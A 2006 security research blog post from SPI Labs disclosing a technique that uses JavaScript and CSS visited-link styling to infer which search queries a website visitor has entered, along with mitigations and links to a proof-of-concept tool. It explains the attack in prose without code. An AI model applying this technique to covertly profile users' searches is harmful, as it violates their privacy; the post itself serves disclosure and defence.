SPI Labs has discovered a practical method of using JavaScript to detect the search queries a user has entered into arbitrary search engines. As seen with the recent leakage of 36 million search queries made by half-a-million America Online subscribers, there are enormous privacy concerns when a user's search queries are made public. All the code needed to steal a user's search queries is written in JavaScript and uses Cascading Style Sheets (CSS). This code could be embedded into any website either by the website owner or by a malicious third party through a Cross-Site Scripting (XSS) attack. There it would harvest information about every visitor to that site. For example, an HMO's website could determine whether a visitor has been searching other sites about cancer, cancer treatments, or drug rehab centers. Government websites could determine whether a visitor has been searching for bomb-making instructions.
The methodology to steal search engine queries from JavaScript is based upon techniques that were presented at Black Hat USA 2006, and that used JavaScript and CSS to determine if a user had visited an arbitrary link [1]. CSS are used to define styles for visited and unvisited hyperlinks. JavaScript is used to dynamically create hyperlinks hidden from the user's view. The browser applies the appropriate visited or unvisited style and JavaScript is then used to read the style and detect if the user has visited the hyperlink. Essentially, JavaScript can now be used to determine whether a user has visited a specific URL.
To steal search engine queries, JavaScript simply checks to see if a user has visited a URL that returns the results page for a given search query. If a user has visited the results page, then the user has searched for that query. Comparing the search results page for each search query reveals that the URLs are very similar. It is trivial for JavaScript to substitute different search queries to determine which ones the user visited.
Stealing queries is not as simple as plugging a search query into a URL and checking it. There are several factors such as letter case, query word order, and the search engine used that can generate hundreds if not thousands of permutations that must be checked. More information about these barriers and how they can be overcome is discussed in greater detail in the full whitepaper [2]. In short, JavaScript code is used to generate all these combinations in the client's browser. For a 4-word search query, over 1000 URLs can be generated and checked in just a few seconds, making this a viable attack vector against modern desktops.
To protect yourself from this threat, end users should routinely clear their browser's history. Developers can reduce the risk of exposing the privacy of their users by securing the site against XSS. More information is available in the full whitepaper.
SPI Labs has created SearchTheft as a proof of concept for the techniques described above. It is written in JavaScript and has been tested against both Mozilla/Firefox and Internet Explorer. SearchTheft automatically generates all letter casing and word order permutations of a given search query and checks if the user has searched for some
variation of that query on a wide variety of search engines. A demonstration of using SearchTheft, as well as the source code, is available to the public [3].
References:
[1] http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf
[2] http://www.spidynamics.com/assets/documents/JS_SearchQueryTheft.pdf
[3] http://www.spidynamics.com/spilabs/js-search/index.html
Posted
10-06-2006 10:14 AM
by
mark.painter